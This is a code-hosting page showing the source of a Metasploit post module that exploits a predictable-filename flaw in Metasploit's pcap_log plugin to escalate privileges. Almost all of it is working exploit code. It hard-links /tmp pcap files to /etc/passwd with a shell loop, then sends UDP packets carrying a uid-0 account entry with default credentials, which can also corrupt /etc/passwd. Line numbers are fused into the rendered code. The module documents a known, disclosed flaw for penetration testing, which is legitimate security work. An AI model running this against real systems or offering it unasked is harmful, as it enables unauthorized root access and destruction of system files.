Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/multi/escalate/metasploit_pcaplog.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6Rank = ManualRanking78include Msf::Post::File910include Msf::Exploit::Local::Linux1112def initialize(info = {})13super(14update_info(15info,16{17'Name' => 'Multi Escalate Metasploit pcap_log Local Privilege Escalation',18'Description' => %q{19Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,20creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these21filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.22This, and all the other packets, are appended to /etc/passwd.2324Successful exploitation results in the creation of a new superuser account.2526This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap27files and truncate /etc/passwd. Note that if this module fails, you can potentially induce28a permanent DoS on the target by corrupting the /etc/passwd file.29},30'License' => MSF_LICENSE,31'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708'],32'Platform' => %w[bsd linux unix],33'SessionTypes' => [ 'shell', 'meterpreter' ],34'References' => [35[ 'BID', '54472' ],36[ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'],37[ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ],38],39'DisclosureDate' => '2012-07-16',40'Stance' => Msf::Exploit::Stance::Passive41}42)43)44register_options(45[46Opt::RPORT(2940),47OptString.new('USERNAME', [ true, 'Username for the new superuser', 'metasploit' ]),48OptString.new('PASSWORD', [ true, 'Password for the new superuser', 'metasploit' ]),49OptInt.new('MINUTES', [true, 'Number of minutes to try to inject', 5])50], self51)52end5354def normalize_minutes55datastore['MINUTES'].abs56rescue StandardError57058end5960def run61print_status "Setting up the victim's /tmp dir"62fail_with(Failure::NotFound, '/etc/passwd not found on system') unless file_exist?('/etc/passwd')63initial_size = read_file('/etc/passwd').lines.count64print_status "/etc/passwd is currently #{initial_size} lines long"65i = 066j = 067loop do68if (i == 0)69j += 170break if j >= datastore['MINUTES'] + 1 # Give up after X minutes7172# 0a2940: cmd_exec is slow, so send 1 command to do all the links73print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})"74cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")75end76current_size = read_file('/etc/passwd').lines.count77if current_size == initial_size78# PCAP is flowing79pkt = "\n\n" + datastore['USERNAME'] + ':' + datastore['PASSWORD'].crypt('0a') + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"80vprint_status("Sending /etc/passwd file contents payload to #{session.session_host}")81udpsock = Rex::Socket::Udp.create(82{83'Context' => { 'Msf' => framework, 'MsfExploit' => self }84}85)86res = udpsock.sendto(pkt, session.session_host, datastore['RPORT'])87else88break89end90sleep(1) # wait a second91i = (i + 1) % 60 # increment second counter92end9394if read_file('/etc/passwd').includes?('Metasploit')95print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account")96# TODO: Consider recording our now-created username and password as a valid credential here.97else98print_error("Failed, the '" + datastore['USERNAME'] + "' user does not appear to have been added")99end100# 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload101# However beceause the session is not a terminal, su will not always allow this.102end103end104105106